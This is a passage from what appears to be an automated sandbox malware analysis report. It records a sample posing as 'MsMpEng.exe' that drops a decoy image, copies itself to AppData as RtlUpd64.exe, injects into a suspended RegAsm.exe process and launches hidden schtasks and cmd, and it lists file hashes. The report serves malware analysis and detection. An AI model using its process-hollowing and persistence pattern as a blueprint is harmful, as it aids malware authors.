| private_0x0000000000120000 | 0x00120000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x002d7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0045ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x00560fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x006fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x0066ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006a0000 | 0x006a0000 | 0x006dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006f0000 | 0x006f0000 | 0x006fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000700000 | 0x00700000 | 0x0085ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00860000 | 0x00b2efff | Memory Mapped File | r |
|
|
|
- |
| expand.exe | 0x00fd0000 | 0x00fdffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000fe0000 | 0x00fe0000 | 0x01bdffff | Pagefile Backed Memory | r |
|
|
|
- |
| dpx.dll | 0x6b5b0000 | 0x6b5f1fff | Memory Mapped File | rwx |
|
|
|
- |
| dbghelp.dll | 0x6f2d0000 | 0x6f3bafff | Memory Mapped File | rwx |
|
|
|
- |
| wdscore.dll | 0x71c80000 | 0x71cb1fff | Memory Mapped File | rwx |
|
|
|
- |
| cabinet.dll | 0x73b50000 | 0x73b64fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75980000 | 0x7598bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75c20000 | 0x75c69fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x75d30000 | 0x75df8fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x75e00000 | 0x75e8efff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75e90000 | 0x75ea8fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75ec0000 | 0x75f0dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76ba0000 | 0x76c40fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76c50000 | 0x76cfbfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76ea0000 | 0x76f6bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76f70000 | 0x7700ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x77010000 | 0x7702efff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77130000 | 0x771ccfff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x772b0000 | 0x7740bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x777b0000 | 0x77883fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x778e0000 | 0x77a1bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77b20000 | 0x77b20fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (7)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | files.cab | file_attributes = _O_SEQUENTIAL |
|
1 | |
| Get Info | files.cab | type = file_attributes |
|
2 | |
| Get Info | files | type = file_attributes |
|
3 | |
| Read | files.cab | size = 36 |
|
1 |
Module (4)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | Expand.exe | base_address = 0xfd0000 |
|
1 | |
| Load | dpx.dll | base_address = 0x6b5b0000 |
|
1 | |
| Get Handle | c:\windows\system32\expand.exe | base_address = 0xfd0000 |
|
1 | |
| Get Address | c:\windows\system32\dpx.dll | function = DpxNewJob, address_out = 0x6b5b3302 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-21 16:19:45 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10933720 |
|
1 | |
| Get Info | type = Operating System |
|
1 |
Process #9: msmpeng.exe
437
0
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\files\msmpeng.exe |
| Command Line | "C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\files\MsMpEng.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:22, Reason: Child Process |
| Unmonitor | End Time: 00:01:35, Reason: Self Terminated |
| Monitor Duration | 00:00:13 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x30c |
| Parent PID | 0x598 (c:\windows\system32\msiexec.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ARRARNMKU\JPenUM |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
2B4
0x
428
0x
44C
0x
4B8
0x
4E4
0x
118
0x
A14
0x
A0C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00041fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x001a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Pagefile Backed Memory | r |
|
|
|
- |
| rpcss.dll | 0x001d0000 | 0x0022bfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| rsaenh.dll | 0x001e0000 | 0x0021bfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x001f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000200000 | 0x00200000 | 0x00200fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x00210000 | 0x00213fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x00220fff | Pagefile Backed Memory | rw |
|
|
|
- |
| msmpeng.exe | 0x00230000 | 0x004fdfff | Memory Mapped File | rwx |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db | 0x00500000 | 0x0051ffff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x00520000 | 0x00523fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000530000 | 0x00530000 | 0x0092ffff | Private Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000a.db | 0x00930000 | 0x0095ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000960000 | 0x00960000 | 0x00d5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000d60000 | 0x00d60000 | 0x00e60fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000e70000 | 0x00e70000 | 0x01a6ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001a70000 | 0x01a70000 | 0x01b4efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001b50000 | 0x01b50000 | 0x01bcffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001bd0000 | 0x01bd0000 | 0x01bd6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001be0000 | 0x01be0000 | 0x01be1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001bf0000 | 0x01bf0000 | 0x01bf1fff | Pagefile Backed Memory | r |
|
|
|
- |
| oleaccrc.dll | 0x01c00000 | 0x01c00fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001c00000 | 0x01c00000 | 0x01c00fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000001c10000 | 0x01c10000 | 0x01c11fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000001c20000 | 0x01c20000 | 0x01c5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001c60000 | 0x01c60000 | 0x01d08fff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01c60000 | 0x01f2efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001f30000 | 0x01f30000 | 0x0212ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001f30000 | 0x01f30000 | 0x0202ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002030000 | 0x02030000 | 0x020d0fff | Private Memory | rw |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x02030000 | 0x02095fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000020a0000 | 0x020a0000 | 0x020a1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000020b0000 | 0x020b0000 | 0x020b0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000020c0000 | 0x020c0000 | 0x020c0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| cversions.2.db | 0x020d0000 | 0x020d3fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000020e0000 | 0x020e0000 | 0x020e0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000020f0000 | 0x020f0000 | 0x0212ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002130000 | 0x02130000 | 0x021d0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002130000 | 0x02130000 | 0x021b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000021e0000 | 0x021e0000 | 0x023dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023e0000 | 0x023e0000 | 0x02435fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000023f0000 | 0x023f0000 | 0x02531fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000024e0000 | 0x024e0000 | 0x024effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002520000 | 0x02520000 | 0x0265dfff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002570000 | 0x02570000 | 0x0296ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002710000 | 0x02710000 | 0x02b0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ba0000 | 0x02ba0000 | 0x02f9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002fa0000 | 0x02fa0000 | 0x03392fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000003450000 | 0x03450000 | 0x0384ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003890000 | 0x03890000 | 0x03c8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003e20000 | 0x03e20000 | 0x0421ffff | Private Memory | rw |
|
|
|
- |
| d3d9.dll | 0x62c00000 | 0x62dc2fff | Memory Mapped File | rwx |
|
|
|
- |
| photoviewer.dll | 0x6b490000 | 0x6b5f5fff | Memory Mapped File | rwx |
|
|
|
- |
| wsock32.dll | 0x6d030000 | 0x6d036fff | Memory Mapped File | rwx |
|
|
|
- |
| ieproxy.dll | 0x6d8e0000 | 0x6d90afff | Memory Mapped File | rwx |
|
|
|
- |
| oleacc.dll | 0x6da80000 | 0x6dabbfff | Memory Mapped File | rwx |
|
|
|
- |
| ieframe.dll | 0x6dac0000 | 0x6e53ffff | Memory Mapped File | rwx |
|
|
|
- |
| shdocvw.dll | 0x70420000 | 0x7044dfff | Memory Mapped File | rwx |
|
|
|
- |
| winmm.dll | 0x70e70000 | 0x70ea1fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x70f00000 | 0x70f4bfff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x724b0000 | 0x724c1fff | Memory Mapped File | rwx |
|
|
|
- |
| gdiplus.dll | 0x73850000 | 0x739dffff | Memory Mapped File | rwx |
|
|
|
- |
| windowscodecs.dll | 0x73c20000 | 0x73d1afff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x73d20000 | 0x73d32fff | Memory Mapped File | rwx |
|
|
|
- |
| photobase.dll | 0x73dd0000 | 0x73ddbfff | Memory Mapped File | rwx |
|
|
|
- |
| d3d8thk.dll | 0x73de0000 | 0x73de5fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74060000 | 0x7409ffff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x74420000 | 0x74426fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x74430000 | 0x7444bfff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x744c0000 | 0x744ccfff | Memory Mapped File | rwx |
|
|
|
- |
| slc.dll | 0x744d0000 | 0x744d9fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x748a0000 | 0x748c0fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x748d0000 | 0x749c4fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74a10000 | 0x74badfff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74f80000 | 0x74f88fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x750e0000 | 0x750f6fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x752a0000 | 0x752dafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75500000 | 0x75515fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75960000 | 0x7597afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75980000 | 0x7598bfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x75a20000 | 0x75a2dfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75a30000 | 0x75a3afff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x75aa0000 | 0x75aabfff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x75ab0000 | 0x75bccfff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75c00000 | 0x75c11fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75c20000 | 0x75c69fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x75c70000 | 0x75c96fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x75d30000 | 0x75df8fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x75e00000 | 0x75e8efff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75e90000 | 0x75ea8fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75ec0000 | 0x75f0dfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75f10000 | 0x76b59fff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x76b60000 | 0x76b94fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76ba0000 | 0x76c40fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76c50000 | 0x76cfbfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x76d60000 | 0x76e95fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76ea0000 | 0x76f6bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76f70000 | 0x7700ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x77010000 | 0x7702efff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x77030000 | 0x77124fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77130000 | 0x771ccfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x771d0000 | 0x77226fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x77230000 | 0x772aafff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x772b0000 | 0x7740bfff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x77410000 | 0x775acfff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x775b0000 | 0x777aafff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x777b0000 | 0x77883fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x77890000 | 0x778d4fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x778e0000 | 0x77a1bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77a30000 | 0x77a34fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x77a70000 | 0x77af2fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x77b00000 | 0x77b05fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77b20000 | 0x77b20fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd5000 | 0x7ffd5000 | 0x7ffd5fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Windows\Installer\MSI81A0.tmp | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 SSDeep: 3:: |
|
|
| C:\Users\JPenUM\AppData\Local\Temp\b106484eb915e4ad6df697dc1442cbff-EDITED.jpg | 1.24 MB |
MD5:
5b9849e016ab5210cbc8e78a1fdd3671
SHA1: 560091b2bdf518dd892016722da62fa613d5e958 SHA256: 76a430452cf0bbb0e429675afd0bf1ff9bb9391f6d41dc293afd6ef06abb7c15 SSDeep: 24576:iJeNNh5l9eiuUVJlVkw0P8LP5A90RT5x0tjNbhC86F:iJeNNTlpVJRfLPo0zx+hClF |
|
|
| C:\Users\JPenUM\AppData\Roaming\appmgr\RtlUpd64.exe | 2.78 MB |
MD5:
51efb1f3b0816090a180ecbcc09b48b1
SHA1: 2401e77e6c9e2084045e88424460441c9a01677a SHA256: 0329e53950720ff5d60c228c3a61109459a8e25a21b5863b4366f80305602b6c SSDeep: 49152:Sw80cTsjkWaYJJeNNTlpVJRfLPo0zx+hClxwA:n8sjkiUp3JBLw0zPlxw |
|
|
Host Behavior
File (22)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\files\MsMpEng.exe | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\JPenUM\AppData\Local\Temp\b106484eb915e4ad6df697dc1442cbff-EDITED.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create Directory | C:\Users\JPenUM\AppData\Roaming\appmgr | - |
|
1 | |
| Get Info | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\files\MsMpEng.exe | type = file_type |
|
2 | |
| Get Info | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\files\MsMpEng.exe:Zone.Identifier | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | type = file_attributes |
|
1 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\appmgr | type = file_attributes |
|
2 | |
| Get Info | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\files\MsMpEng.exe | type = file_attributes |
|
1 | |
| Get Info | C:\Users\JPenUM\AppData\Roaming\appmgr\RtlUpd64.exe | type = file_attributes |
|
2 | |
| Get Info | RtlUpd64.exe | type = file_attributes |
|
2 | |
| Get Info | appmgr | type = file_attributes |
|
2 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Copy | C:\Users\JPenUM\AppData\Roaming\appmgr\RtlUpd64.exe | source_filename = C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\files\MsMpEng.exe, copy_flags = COPY_FILE_ALLOW_DECRYPTED_DESTINATION |
|
1 |
Registry (3)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Control Panel\Mouse | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\AutoIt v3\AutoIt | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Control Panel\Mouse | value_name = SwapMouseButtons, data = 48 |
|
1 |
Process (5)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\JPenUM\AppData\Local\Temp\b106484eb915e4ad6df697dc1442cbff-EDITED.jpg | show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | os_pid = 0x24c, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Create | schtasks | show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | show_window = SW_HIDE |
|
1 | |
| Open | c:\windows\microsoft.net\framework\v2.0.50727\regasm.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_SET_SESSIONID, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_DUP_HANDLE, PROCESS_CREATE_PROCESS, PROCESS_SET_QUOTA, PROCESS_SET_INFORMATION, PROCESS_QUERY_INFORMATION, PROCESS_SUSPEND_RESUME, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
1 |
Thread (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Context | c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\files\msmpeng.exe | os_tid = 0x2b4 |
|
1 | |
| Set Context | c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\files\msmpeng.exe | os_tid = 0x2b4 |
|
1 | |
| Resume | c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\files\msmpeng.exe | os_tid = 0x2b4 |
|
1 |
Memory (8)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Allocate | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 352256 |
|
1 | |
| Protect | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | address = 0x400000, protection = PAGE_READONLY, size = 512 |
|
1 | |
| Protect | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | address = 0x402000, protection = PAGE_EXECUTE_READ, size = 326948 |
|
1 | |
| Protect | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | address = 0x452000, protection = PAGE_READONLY, size = 720 |
|
1 | |
| Protect | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | address = 0x454000, protection = PAGE_READONLY, size = 12 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | address = 0x7ffdb008, size = 4 |
|
1 | |
| Write | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | address = 0x400000, size = 352256 |
|
1 | |
| Write | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | address = 0x7ffdb008, size = 4 |
|
1 |
Module (97)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x777b0000 |
|
19 | |
| Load | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\files\MsMpEng.exe | base_address = 0x230000 |
|
2 | |
| Load | Advapi32.dll | base_address = 0x76f70000 |
|
1 | |
| Load | kernel32 | base_address = 0x777b0000 |
|
3 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x777b0000 |
|
1 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\files\msmpeng.exe, file_name_orig = C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\files\MsMpEng.exe, size = 260 |
|
1 | |
| Get Filename | - | process_name = c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\files\msmpeng.exe, file_name_orig = C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\files\MsMpEng.exe, size = 32767 |
|
4 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7780418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x77801f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x77801e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x778076e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x77803879 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x777b24d8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x777e2111 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x777f2510 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x777eb009 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x779089be |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x778fc02a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x778fc0d2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x777e3f78 |
|
1 | |
